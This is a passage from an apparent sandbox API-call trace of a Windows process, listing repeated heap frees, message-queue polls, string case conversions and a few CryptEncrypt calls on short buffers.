wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0250.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.044] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.044] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.044] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.045] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0250.045] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.045] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0250.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.045] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0250.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.046] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.046] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.047] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.047] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0250.047] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0250.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0250.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.051] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0250.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.051] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0250.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.052] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.052] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b2c18*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b2c18*, pdwDataLen=0x8bef68*=0x8) returned 1 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.053] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0250.053] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.053] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0250.053] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.053] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.053] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0250.053] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.053] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0250.053] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.053] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.053] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0250.053] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.053] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0250.053] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0250.053] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0250.053] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0250.053] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0250.054] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.054] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.054] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.055] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.055] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.055] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0250.055] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.055] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0250.055] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.055] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.055] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.055] PeekMessageW (in: lpMsg=0x8bedb8, 